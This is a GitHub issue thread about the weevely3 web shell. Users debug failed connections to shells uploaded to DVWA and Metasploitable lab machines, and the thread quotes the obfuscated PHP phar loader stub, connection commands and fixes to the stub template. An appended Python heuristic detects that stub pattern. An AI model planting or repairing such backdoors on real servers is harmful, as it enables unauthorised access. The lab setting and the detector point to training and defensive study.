epinna / weevely3

Weaponized web shell
GNU General Public License v3.0

Backdoor communication failed - weevely 4.0.2 #191

Open aatif007 opened 1 month ago

aatif007 commented 1 month ago

Warning: include(phar://shell2.php/x) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/hackable/uploads/shell2.php on line 1

Warning: include() [function.include]: Failed opening 'phar://shell2.php/x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/dvwa/hackable/uploads/shell2.php on line 1

Why does this error occur? I cannot modify the file shell2.php

ZanyMonk commented 1 month ago

Please update to version 4.0.2 and try again.

aatif007 commented 1 month ago

Same issues.

I updated the version but it's not working @ZanyMonk

When I connect:

./weevely.py http://10.0.2.6/dvwa/hackable/uploads/shell95.php 123456

/root/weevely3/modules/audit/filesystem.py:114: SyntaxWarning: invalid escape sequence '.'
  '.gpg', 'sudoers' ]
/root/weevely3/modules/shell/su.py:30: SyntaxWarning: invalid escape sequence '\s'
  postprocess=lambda x: re.findall('Password: (?:\r\n)?([\s\S]+)', x)[0] if 'Password: ' in x else ''
/root/weevely3/modules/sql/console.py:151: SyntaxWarning: invalid escape sequence '\q'
  if query in ['quit', '\q', 'exit']:
/root/weevely3/modules/sql/console.py:153: SyntaxWarning: invalid escape sequence '\s'
  m = re.findall("^use\s+([\w]+);?$", query, re.IGNORECASE)
/root/weevely3/modules/file/grep.py:40: SyntaxWarning: invalid escape sequence '\/'
  payload = """% if invert:
/root/weevely3/modules/file/edit.py:47: SyntaxWarning: invalid escape sequence '\W'
  suffix = re.sub('[\W]+', '', self.args['rpath'])
/root/weevely3/modules/net/proxy.py:32: SyntaxWarning: invalid escape sequence '.'
  re_valid_ip = re.compile("^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]).){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
/root/weevely3/modules/net/proxy.py:33: SyntaxWarning: invalid escape sequence '-'
  re_valid_hostname = re.compile("^(([a-zA-Z0-9-]+).)([A-Za-z]|[A-Za-z][A-Za-z0-9-][A-Za-z0-9])$")
/root/weevely3/modules/net/ifconfig.py:37: SyntaxWarning: invalid escape sequence '\S'
  ifaces = re.findall('^(\S+).?inet addr:(\S+).?Mask:(\S+)', result, re.S | re.M)

[+] weevely 4.0.2
[+] Target: 10.0.2.6
[+] Session: /root/.weevely/sessions/10.0.2.6/shell95_0.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> pwd
Backdoor communication failed, check URL availability and password
weevely>
Exiting.

ZanyMonk commented 1 month ago

I cannot reproduce your error. Please, upload the generated shell95.php file here, I'll have a look.

aatif007 commented 1 month ago

<?php include "\160\x68\141\x72\72\57\57".basename(__FILE__)."\57\x78";__HALT_COMPILER(); ?>

file code and zip file @ZanyMonk shell95.zip

ZanyMonk commented 1 month ago

I'm still unable to reproduce. Are you using a default PHP configuration? If not, please provide the php.ini file.

aatif007 commented 1 month ago

Yes, I am using the default PHP configuration. Here is the php.ini file.

php.zip @ZanyMonk

ZanyMonk commented 1 month ago

In bd/obfuscators/phar.tpl replace dirname(__FILE__) with realpath(__FILE__).

It looks like __FILE__ is returning a relative path for whatever reason. This should fix it.

aatif007 commented 1 month ago

In the file bd/obfuscators/phar.tpl I can't find dirname(__FILE__). Here is the file.

Can I change it with stub = b"""<?php include "\160\x68\141\x72\72\57\57".basename(__FILE__)."\57\x78";__HALT_COMPILER(); ?>"""

Replace basename(__FILE__) with realpath(__FILE__)

phar.zip

Where should I change it?

@ZanyMonk

ZanyMonk commented 1 month ago

I'm sorry, I meant basename(__FILE__) ...

Anyways, the webshell can't be found and I don't know why. Maybe try to tinker with the stub and find what works for you. Good luck.

aatif007 commented 1 month ago

Still issues. Is there anyone who can please help me? Thanks for your time @ZanyMonk

Creator1024 commented 4 weeks ago

I had the same problem.

weevely version: 4.0.2
metasploitable version: Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

EddyMexico commented 3 weeks ago

I am having the exact same problem. I had an assignment with this tool but I won't be able to do it lol. I don't know if trying with legacy/different versions would work.

term51 commented 3 weeks ago

The same problem:

Warning: include(phar:///var/www/dvwa/hackable/uploads/shell.php/x) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/hackable/uploads/shell.php on line 1

Warning: include() [function.include]: Failed opening 'phar:///var/www/dvwa/hackable/uploads/shell.php/x' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/dvwa/hackable/uploads/shell.php on line 1

Even with realpath.
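A defensive check for the stub pattern quoted in this thread, as an added example that is not part of the original issue or of weevely's code: it decodes PHP octal and hex string escapes and flags a file that includes from a hidden `phar://` path and carries data after `__HALT_COMPILER();`. The function names and the zero-byte sample payload are constructed for illustration.

```python
import re

# PHP double-quoted strings accept \NNN (octal) and \xHH (hex) escapes.
_ESCAPE = re.compile(rb"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))")
_DQ_STRING = re.compile(rb'"((?:[^"\\]|\\.)*)"', re.S)
_INCLUDE = re.compile(rb"\b(?:include|require)(?:_once)?\b", re.I)
_HALT = re.compile(rb"__HALT_COMPILER\s*\(\s*\)\s*;(?:\s*\?>)?", re.I)


def decode_php_escapes(literal: bytes) -> bytes:
    """Resolve \\NNN and \\xHH escapes the way PHP would in a "..." string."""
    def repl(m):
        if m.group(1) is not None:
            return bytes([int(m.group(1), 16)])
        return bytes([int(m.group(2), 8) & 0xFF])  # PHP wraps octal > 0377
    return _ESCAPE.sub(repl, literal)


def inspect_php(source: bytes) -> dict:
    """Heuristic for files found in an upload directory (not a full PHP parser)."""
    halt = _HALT.search(source)
    code = source[:halt.start()] if halt else source
    decoded = [decode_php_escapes(m.group(1)) for m in _DQ_STRING.finditer(code)]
    has_wrapper = any(b"phar://" in d.lower() for d in decoded)
    result = {
        # an include/require whose string operand resolves to a phar:// path
        "phar_include": bool(_INCLUDE.search(code)) and has_wrapper,
        # the wrapper name only appears after decoding the escapes
        "obfuscated": has_wrapper and b"phar://" not in code.lower(),
        # bytes stored after __HALT_COMPILER(); (the embedded archive)
        "payload_bytes": len(source) - halt.end() if halt else 0,
    }
    result["suspicious"] = result["phar_include"] and result["payload_bytes"] > 0
    return result


# Stub as quoted in the thread; the 16 zero bytes are a constructed placeholder
# standing in for the archive data, not a real payload.
STUB = (rb'<?php include "\160\x68\141\x72\72\57\57".basename(__FILE__)."\57\x78";'
        rb'__HALT_COMPILER(); ?>' + b"\x00" * 16)
BENIGN = b'<?php include "lib/config.php"; echo "hello"; ?>'  # constructed sample

if __name__ == "__main__":
    for name, data in (("stub", STUB), ("benign", BENIGN)):
        print(name, inspect_php(data))
```
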